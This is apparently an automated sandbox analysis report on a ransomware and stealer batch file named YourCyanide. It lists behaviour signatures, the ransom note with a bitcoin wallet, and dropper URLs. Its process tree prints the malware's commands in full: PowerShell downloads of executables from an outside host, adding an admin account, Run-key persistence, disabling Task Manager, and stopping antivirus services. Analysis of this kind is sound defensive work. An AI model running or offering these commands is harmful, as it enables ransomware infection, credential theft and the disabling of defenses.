6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725

Analysis

max time kernel
433s
max time network
435s
platform
windows7_x64
resource
win7-20220414-en
submitted
22-05-2022 23:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide.bat
Size

150KB
MD5

fdd17cbaa7423d1c9ca1ffb376d30b36
SHA1

47986c795d7a2521408f4f63a6b068c054659bc7
SHA256

6d4eafaeac05daa575d551127bffc77e92fae88887c3168318fe50dc26b8d725
SHA512

3aa57c435f462bea43ba87d527603ceabedff24c1353e64dc9b6e2c89956d2216030030e14056095afb4db17eb44f6f33dbed95054d5852cd9a4eccb5d6088cf

Score

10^/10

collection evasion persistence ransomware spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note

Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay? A: You will never get your files back. Q: How can I contact you? A: contact at yourcyanide.help@gmail.com. Q: How many files were encrypted? A: 24327 files have been encrypted. -Love YourCyanide 1:27:12.08, Mon 05/23/2022

Emails

yourcyanide.help@gmail.com

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow pid process

4 912 powershell.exe
6 580 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

NoKeyB.exeGetToken.exe

pid process

2016 NoKeyB.exe
1632 GetToken.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Loads dropped DLL 1 IoCs

Processes:

cmd.exe

pid process

948 cmd.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

flow	pid	process
4	912	powershell.exe
6	580	powershell.exe

pid	process
2016	NoKeyB.exe
1632	GetToken.exe

pid	process
948	cmd.exe

Accesses Microsoft Outlook profiles 1 TTPs 5 IoCs

collection

Email Collection

T1114

Processes:

OUTLOOK.EXE

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OUTLOOK.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	OUTLOOK.EXE
Key queried	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	OUTLOOK.EXE

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_25967_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.bat"	reg.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

cmd.exe

description	ioc	process
File opened (read-only)	\??\A:	cmd.exe
File opened (read-only)	\??\I:	cmd.exe
File opened (read-only)	\??\M:	cmd.exe
File opened (read-only)	\??\T:	cmd.exe
File opened (read-only)	\??\Y:	cmd.exe
File opened (read-only)	\??\B:	cmd.exe
File opened (read-only)	\??\E:	cmd.exe
File opened (read-only)	\??\Q:	cmd.exe
File opened (read-only)	\??\S:	cmd.exe
File opened (read-only)	\??\W:	cmd.exe
File opened (read-only)	\??\Z:	cmd.exe
File opened (read-only)	\??\H:	cmd.exe
File opened (read-only)	\??\K:	cmd.exe
File opened (read-only)	\??\L:	cmd.exe
File opened (read-only)	\??\P:	cmd.exe
File opened (read-only)	\??\F:	cmd.exe
File opened (read-only)	\??\G:	cmd.exe
File opened (read-only)	\??\J:	cmd.exe
File opened (read-only)	\??\N:	cmd.exe
File opened (read-only)	\??\O:	cmd.exe
File opened (read-only)	\??\R:	cmd.exe
File opened (read-only)	\??\U:	cmd.exe
File opened (read-only)	\??\V:	cmd.exe
File opened (read-only)	\??\X:	cmd.exe

Drops file in System32 directory 14 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\PerfStringBackup.INI	OUTLOOK.EXE
File created	C:\Windows\system32\perfc007.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00C.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc010.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh010.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc011.dat	OUTLOOK.EXE
File created	C:\Windows\SysWOW64\PerfStringBackup.TMP	OUTLOOK.EXE
File created	C:\Windows\system32\perfh009.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh00C.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh007.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfc00A.dat	OUTLOOK.EXE
File created	C:\Windows\system32\perfh011.dat	OUTLOOK.EXE

Drops file in Windows directory 5 IoCs

Processes:

cmd.exeOUTLOOK.EXE

description	ioc	process
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe
File created	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File opened for modification	C:\Windows\inf\Outlook\outlperf.h	OUTLOOK.EXE
File created	C:\Windows\inf\Outlook\0009\outlperf.ini	OUTLOOK.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1696 tasklist.exe

pid	process
1696	tasklist.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

OUTLOOK.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\Toolbar	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	OUTLOOK.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	OUTLOOK.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	OUTLOOK.EXE
Key created	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	OUTLOOK.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	OUTLOOK.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	OUTLOOK.EXE

Modifies registry class 64 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00067368-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309A-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063037-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672F8-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063001-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D1-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D8-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630A8-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C3-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063075-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DC-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006302D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C7-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DE-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E2-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307B-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EA-0000-0000-C000-000000000046}\ = "_CalendarModule"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630EE-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D87E7E17-6897-11CE-A6C0-00AA00608FAA}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DA-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000672DF-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063001-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063045-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063006-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E3-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F3-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006F026-0000-0000-C000-000000000046}\ = "_DDocSiteControl"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FD-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C5-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630DA-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063089-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F0-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630F1-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063103-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630CF-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E1-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309D-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309C-0000-0000-C000-000000000046}\ = "_TimelineView"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FF-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{50BB9B50-811D-11CE-B565-00AA00608FAA}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E8-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006300F-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309B-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FF-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063038-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006304B-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063049-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630C9-0000-0000-C000-000000000046}\ = "_ExchangeUser"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006307A-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630FE-0000-0000-C000-000000000046}\TypeLib\ = "{00062FFF-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063107-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063043-0000-0000-C000-000000000046}\ = "Action"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006303C-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063042-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063042-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063102-0000-0000-C000-000000000046}	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006309D-0000-0000-C000-000000000046}	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0006305A-0000-0000-C000-000000000046}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063040-0000-0000-C000-000000000046}\TypeLib	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630D3-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{000630E1-0000-0000-C000-000000000046}\ProxyStubClsid32	OUTLOOK.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{00063101-0000-0000-C000-000000000046}\TypeLib\Version = "9.4"	OUTLOOK.EXE

NTFS ADS 2 IoCs

Processes:

cmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Documents\%c¼├XV:~30	cmd.exe
File opened for modification	C:\Users\Admin\Desktop\%c¼├XV:~23	cmd.exe

Runs net.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

OUTLOOK.EXE

pid process

1488 OUTLOOK.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

GetToken.exe

pid process

1632 GetToken.exe

pid	process
1488	OUTLOOK.EXE

pid	process
1632	GetToken.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
912	powershell.exe
1812	powershell.exe
1812	powershell.exe
580	powershell.exe
1324	powershell.exe
1736	powershell.exe
1716	powershell.exe
1532	powershell.exe
1632	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

OUTLOOK.EXE

pid process

1488 OUTLOOK.EXE

pid	process
1488	OUTLOOK.EXE

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	912	powershell.exe
Token: SeDebugPrivilege	1812	powershell.exe
Token: SeDebugPrivilege	580	powershell.exe
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	1696	tasklist.exe
Token: SeDebugPrivilege	1632	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

NoKeyB.exeOUTLOOK.EXE

pid process

2016 NoKeyB.exe
1488 OUTLOOK.EXE
1488 OUTLOOK.EXE
1488 OUTLOOK.EXE
Suspicious use of SendNotifyMessage 3 IoCs

Processes:

NoKeyB.exeOUTLOOK.EXE

pid process

2016 NoKeyB.exe
1488 OUTLOOK.EXE
1488 OUTLOOK.EXE
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

NoKeyB.exeOUTLOOK.EXEpowershell.exe

pid process

2016 NoKeyB.exe
1488 OUTLOOK.EXE
1632 powershell.exe

pid	process
2016	NoKeyB.exe
1488	OUTLOOK.EXE
1488	OUTLOOK.EXE
1488	OUTLOOK.EXE

pid	process
2016	NoKeyB.exe
1488	OUTLOOK.EXE
1488	OUTLOOK.EXE

pid	process
2016	NoKeyB.exe
1488	OUTLOOK.EXE
1632	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exe

description	pid	process	target process
PID 948 wrote to memory of 1528	948	cmd.exe	attrib.exe
PID 948 wrote to memory of 1528	948	cmd.exe	attrib.exe
PID 948 wrote to memory of 1528	948	cmd.exe	attrib.exe
PID 948 wrote to memory of 964	948	cmd.exe	rundll32.exe
PID 948 wrote to memory of 964	948	cmd.exe	rundll32.exe
PID 948 wrote to memory of 964	948	cmd.exe	rundll32.exe
PID 948 wrote to memory of 912	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 912	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 912	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 2016	948	cmd.exe	NoKeyB.exe
PID 948 wrote to memory of 2016	948	cmd.exe	NoKeyB.exe
PID 948 wrote to memory of 2016	948	cmd.exe	NoKeyB.exe
PID 948 wrote to memory of 1812	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1812	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1812	948	cmd.exe	powershell.exe
PID 948 wrote to memory of 1880	948	cmd.exe	net.exe
PID 948 wrote to memory of 1880	948	cmd.exe	net.exe
PID 948 wrote to memory of 1880	948	cmd.exe	net.exe
PID 1880 wrote to memory of 612	1880	net.exe	net1.exe
PID 1880 wrote to memory of 612	1880	net.exe	net1.exe
PID 1880 wrote to memory of 612	1880	net.exe	net1.exe
PID 948 wrote to memory of 1512	948	cmd.exe	reg.exe
PID 948 wrote to memory of 1512	948	cmd.exe	reg.exe
PID 948 wrote to memory of 1512	948	cmd.exe	reg.exe
PID 948 wrote to memory of 1308	948	cmd.exe	reg.exe
PID 948 wrote to memory of 1308	948	cmd.exe	reg.exe
PID 948 wrote to memory of 1308	948	cmd.exe	reg.exe
PID 948 wrote to memory of 840	948	cmd.exe	net.exe
PID 948 wrote to memory of 840	948	cmd.exe	net.exe
PID 948 wrote to memory of 840	948	cmd.exe	net.exe
PID 840 wrote to memory of 1548	840	net.exe	net1.exe
PID 840 wrote to memory of 1548	840	net.exe	net1.exe
PID 840 wrote to memory of 1548	840	net.exe	net1.exe
PID 948 wrote to memory of 576	948	cmd.exe	net.exe
PID 948 wrote to memory of 576	948	cmd.exe	net.exe
PID 948 wrote to memory of 576	948	cmd.exe	net.exe
PID 576 wrote to memory of 1624	576	net.exe	net1.exe
PID 576 wrote to memory of 1624	576	net.exe	net1.exe
PID 576 wrote to memory of 1624	576	net.exe	net1.exe
PID 948 wrote to memory of 1740	948	cmd.exe	net.exe
PID 948 wrote to memory of 1740	948	cmd.exe	net.exe
PID 948 wrote to memory of 1740	948	cmd.exe	net.exe
PID 1740 wrote to memory of 1116	1740	net.exe	net1.exe
PID 1740 wrote to memory of 1116	1740	net.exe	net1.exe
PID 1740 wrote to memory of 1116	1740	net.exe	net1.exe
PID 948 wrote to memory of 1884	948	cmd.exe	net.exe
PID 948 wrote to memory of 1884	948	cmd.exe	net.exe
PID 948 wrote to memory of 1884	948	cmd.exe	net.exe
PID 1884 wrote to memory of 1072	1884	net.exe	net1.exe
PID 1884 wrote to memory of 1072	1884	net.exe	net1.exe
PID 1884 wrote to memory of 1072	1884	net.exe	net1.exe
PID 948 wrote to memory of 832	948	cmd.exe	net.exe
PID 948 wrote to memory of 832	948	cmd.exe	net.exe
PID 948 wrote to memory of 832	948	cmd.exe	net.exe
PID 832 wrote to memory of 1180	832	net.exe	net1.exe
PID 832 wrote to memory of 1180	832	net.exe	net1.exe
PID 832 wrote to memory of 1180	832	net.exe	net1.exe
PID 948 wrote to memory of 1064	948	cmd.exe	net.exe
PID 948 wrote to memory of 1064	948	cmd.exe	net.exe
PID 948 wrote to memory of 1064	948	cmd.exe	net.exe
PID 1064 wrote to memory of 1584	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1584	1064	net.exe	net1.exe
PID 1064 wrote to memory of 1584	1064	net.exe	net1.exe
PID 948 wrote to memory of 1900	948	cmd.exe	net.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exe

pid process

1528 attrib.exe

pid	process
1528	attrib.exe

outlook_win_path 1 IoCs

Processes:

OUTLOOK.EXE

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-2277218442-1199762539-2004043321-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	OUTLOOK.EXE

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat"
1⤵
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Windows directory
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:948

C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat
2⤵
- Views/modifies file attributes
PID:1528

C:\Windows\system32\rundll32.exe
RUNDLL32 USER32.DLL SwapMouseButton
2⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976894591552860220/NoKeyB.exe', 'NoKeyB.exe')"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:912

C:\Users\Admin\Documents\NoKeyB.exe
NoKeyB.exe
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Set-ExecutionPolicy Unrestricted"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\system32\net.exe
net localgroup administrators session /ADD
2⤵
- Suspicious use of WriteProcessMemory
PID:1880

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators session /ADD
3⤵
PID:612

C:\Windows\system32\reg.exe
reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_25967_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.bat /f
2⤵
- Adds Run key to start application
PID:1512

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
2⤵
PID:1308

C:\Windows\system32\net.exe
net stop "Security Center" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Security Center" /y
3⤵
PID:1548

C:\Windows\system32\net.exe
net stop "Automatic Updates" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Automatic Updates" /y
3⤵
PID:1624

C:\Windows\system32\net.exe
net stop "Symantec Core LC" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Symantec Core LC" /y
3⤵
PID:1116

C:\Windows\system32\net.exe
net stop "SAVScan" /y
2⤵
- Suspicious use of WriteProcessMemory
PID:1884

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SAVScan" /y
3⤵
PID:1072

C:\Windows\system32\net.exe
net stop "norton AntiVirus Firewall Monitor Service" /y
